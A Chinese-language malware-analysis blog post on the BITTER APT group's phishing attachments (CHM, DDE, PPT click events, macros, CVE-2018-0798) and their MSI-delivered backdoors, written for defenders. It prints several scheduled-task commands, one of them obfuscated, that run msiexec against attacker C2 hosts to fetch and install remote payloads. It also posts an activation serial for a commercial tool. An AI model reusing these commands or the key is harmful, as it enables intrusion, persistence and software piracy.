前言

最近有遇到，所以整合了一下近期”蔓灵花“组织钓鱼邮件中恶意附件执行的常见手法，包括:

• 恶意“.chm”文件投放
• 恶意”DDE”隐藏域代码执行
• “.ppt”文件PowerPoint单击鼠标事件
• 恶意宏文档
• 公式编辑器漏洞利用

如果你刚好想了解恶意附件的执行流程，这篇文章会让你对上述的5类手法有个基本认识。后续会记录23年5月首次曝光的“蔓灵花”恶意邮件附件配套的后续载荷，白加黑”ORPCBackdoor“后门。（在此之前后续载荷常见为”wmRAT“远控）。

背景

蔓灵花组织，又称为BITTER、APT-C-08、苦象、T-APT-17，是一支据称有南亚背景的高级持久性威胁（APT）组织。自2013年11月起，该组织开始活跃，并主要专注于巴基斯坦和中国两国。其攻击目标主要包括政府部门、电力行业、军工业相关单位，其意图是窃取敏感资料。

一、  恶意附件手法分析

例举的五种已知的“蔓灵花”组织钓鱼手法，最终目的大都是创建计划任务定时15到25分钟请求一次C2远程加载（msiexec）恶意“.msi”文件。在请求时会带上计算机名和用户名,上线后C2后台会用计算机名和用户名创建一个空白的文件夹。攻击者会在诸多文件夹中挑选感兴趣的目标放入“.msi”文件，选中目标下次计划任务成功执行就会完成恶意的远程加载。

所以想去获取后续载荷直接访问多数时候是空的。

（一）“.chm”文件投放

大概从2021年初起，“蔓灵花”组织使用“.chm”恶意文件投递的手法就很常见，这些年又猛猛吃老本。下图是一个受控的“.gov”邮箱账号，散播携带“.chm”恶意文件压缩包附件的邮件。

查看其包含的恶意代码如下，主要是功能是创建一个恶意的计划任务。

每隔17分钟远程加载（msiexec）一次恶意资源，并且上传主机名和用户名，计划任务如下图。

http://comnmsgwrapsvc.net/ver/verif.php/?h=%computername%*%username% 
http://folkmusicstreams.com/TIME/mac.php?sit=%computername%*%username%

抓取数据包如下图。

msiexec命令远程加载是值得注意的事情。msiexec是Windows操作系统下的命令行工具，用于安装、修复、卸载Windows Installer软件包。它支持加载远程资源安装，运行时，将msi文件从远程位置下载到本地的临时目录中，并在本地落地进行安装。安装完成或发生错误，临时的msi文件将从磁盘上删除。

所以在取证时，在受检PC或服务器是找不到msi包的。但是该方法在流量分析的角度是很容易被检测，使用msiexec做远程http资源加载，http头“User-Agent”字段固定为“Windows Installer”（如上图）,如果你编写检测规则，一律判定恶意，就可以检测此类的远程加载恶意行为。

后续场景就不再详细介绍，涉及手法内容介绍详尽。

（二）恶意”DDE”隐藏域代码执行

攻击者投递带有恶意DDE auto的文档。”.docx“文档打开时一片空白（也可能有其他正常的一些迷惑文字或图片信息），在选项中找到->视图->显示文档内容->域代码。

打开之后长这样，实际上是十进制数。

对应转ascll文本，同样是计划任务远程加载恶意msi文件。

"cmd /c msiexec.exe /i http://nesiallservice.net/chq/stall.msi /q"

值得一提的是APT-Q-42腾云蛇组织用过类似的手法，南亚组织手法错综复杂，好几个组织搞不好就是一伙人。

（三）“.ppt”文件PowerPoint单击鼠标事件

攻击者下发恶意”.PPT“文件。在图片上设置了鼠标单击事件，同样是创建计划任务远程加载恶意msi资源。

cmd.exe <p style=color:white> /c schtasks /create /sc minute /mo 15 /tn AudioDg /f /tr  "%coMSPec% /c start /min msiexec /i  http://farleysmxpph.com/FOXX/far.php?ptu=%computername%*%username% /qn /norestart"& echo"</p><h3>继续</h3><p style=color:white>

（四）文档宏病毒

攻击者下发携带恶意宏的文件。宏文档投递数相对较少见，毕竟初次要提示用户启用与否，可能总体成功率不高。启用宏之后在开发工具–>VB编辑器中查看。

可能存在密码校验，使用工具VBA_Password_Bypasser即可解密，注意这玩意儿要激活才能使用（激活码附后面了）。后续就可以分析其中的恶意代码功能了。

工具激活码
Username: JekG
Serial: 000014-RE613W-5D877U-KDNY8V-ZZFZZZ-ZZZZZZ-ZWCJP9-51VJ00-800000-000000

（五）CVE-2018-0798公式编辑器漏洞

攻击者下发携带漏洞的”.xlsx”文件，在诸多公式编辑器漏洞里，CVE-2018-0798算是利用成功率比较高的。

CVE-2018-0798影响微软Office 2016、Microsoft Office 2013 Service Pack 1、Microsoft Office 2010 Service Pack 2、Microsoft Office 2016 for Mac和Microsoft Office 2011 for Mac等软件版本

这受影响的版本软件还有点难找。

这是进程释放的详情，也是一样的创建计划任务远程恶意加载。

"C:WindowsSystem32schtasks.exe" /create /sc MINUTE /mo 15 /TN WindowsDWMDWMCORE /TR "cmd /c start /min ms^iex^ec /i htt^p^:^//alf^ieh^eal^thc^ares^erv^ice^.^com/AL/al.php/?dt=%computername% /q" /f

二、“.MSI”文件

接下来就分析投放的“.msi”文件，两个恶意”.msi“文件释放最终远控木马方式不同。

• 目标文件”1.msi“被系统msiexec.exe执行后，会在当前目录释放wmRAT。（用压缩包打开也可以看见）。

其基本信息如下，这是23年2月的的wmRAT样本

• 目标文件”2.msi“在%temp%目录下释放files.cab文件，然后解压该文件，里面包含白程序MSOutlookServices.exe和恶意文件OLMAPI32.dll，同样，使用7zip可以看到被打包在msi文件中。

三、ORPCBackdoor”白加黑“远控木马分析

这里分析的上述的白加黑手法的远控木马。执行白文件MSOutlookServices.exe时，会加载恶意文件OLMAPI32.dll，其中白文件有微软官方签名。 

MSOutlookServices.exe加载恶意OLMAPI32.dll功能函数如图。